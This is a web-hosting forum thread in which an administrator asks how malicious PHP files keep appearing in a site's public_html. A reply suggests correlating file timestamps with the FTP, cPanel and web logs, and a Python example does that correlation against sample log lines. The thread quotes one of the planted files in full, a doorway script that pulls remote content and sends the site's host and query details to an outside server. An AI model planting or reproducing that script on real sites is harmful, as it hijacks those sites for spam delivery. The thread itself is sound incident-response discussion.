Find out how files were uploaded

::Gomez::

Hi, I am dealing with a security issue inside an account. Every day new files are uploaded to public_html and subfolders, with strange content inside.

for example...

/home/xxx/public_html/rtrfei.php
/home/xxx/public_html/fdbs.php

content is pretty much the same on any of the files...

PHP:
<?php
set_time_limit(0);

header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
$Remote_server = "http://www.example.date/";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($Remote_server."/AK47/2.html?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;

?>

I would like to know if there is any way of finding out how these files were uploaded (FTP, SCP, SSH, via a script on the server, etc.).


I think this is the first step to be able to identify the root cause of this issue..

I do have root access to the server.


thanks!
 

sparek-3

You need to get a timestamp of when the files were placed on the server, then look for activity (cPanel access, FTP, web) around that same time. That will help lead you in the direction of how the files came to be on the server.
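
The timestamp correlation suggested in the reply above, sketched for the web case only (an added example, not code from the thread or from cPanel): it takes the change time of a dropped file and returns the access-log requests that fall within a short window of it. The log lines, IP addresses, request paths and timestamp are constructed sample data; the same window applies to FTP and cPanel logs.

```python
import re
from datetime import datetime, timedelta, timezone

# Apache/NCSA access-log line: client, [timestamp], "METHOD path ..."
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)')

def parse_access_line(line):
    """Return (utc_time, client_ip, method, path), or None if the line does not match."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    when = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
    return when.astimezone(timezone.utc), m.group(1), m.group(3), m.group(4)

def requests_near(file_change_epoch, log_lines, window_seconds=120):
    """Access-log entries within +/- window_seconds of the file's change time.

    file_change_epoch is os.stat(path).st_ctime for the dropped file: ctime is
    set by the kernel, whereas mtime can be rewritten with touch.
    POST requests sort first because a web upload typically arrives as a POST.
    """
    changed = datetime.fromtimestamp(file_change_epoch, tz=timezone.utc)
    window = timedelta(seconds=window_seconds)
    hits = []
    for line in log_lines:
        parsed = parse_access_line(line)
        if parsed and abs(parsed[0] - changed) <= window:
            hits.append(parsed)
    return sorted(hits, key=lambda h: (h[2] != "POST", abs(h[0] - changed)))

# Constructed sample data (not from the thread): three access-log lines and a
# file whose ctime is 2016-03-12 07:17:33 UTC (04:17:33 at the log's -0300 offset).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2016:04:10:02 -0300] "GET /index.php HTTP/1.1" 200 5120',
    '203.0.113.5 - - [12/Mar/2016:04:17:32 -0300] "POST /old-form/upload.php HTTP/1.1" 200 64',
    '198.51.100.9 - - [12/Mar/2016:04:17:50 -0300] "GET /contact.php HTTP/1.1" 200 2048',
]
SAMPLE_CTIME = datetime(2016, 3, 12, 7, 17, 33, tzinfo=timezone.utc).timestamp()

if __name__ == "__main__":
    for when, ip, method, path in requests_near(SAMPLE_CTIME, SAMPLE_LOG):
        print(when.isoformat(), ip, method, path)
```

If no web request lines up with the file's change time, the same timestamp is the key for searching the FTP, SSH and cPanel logs.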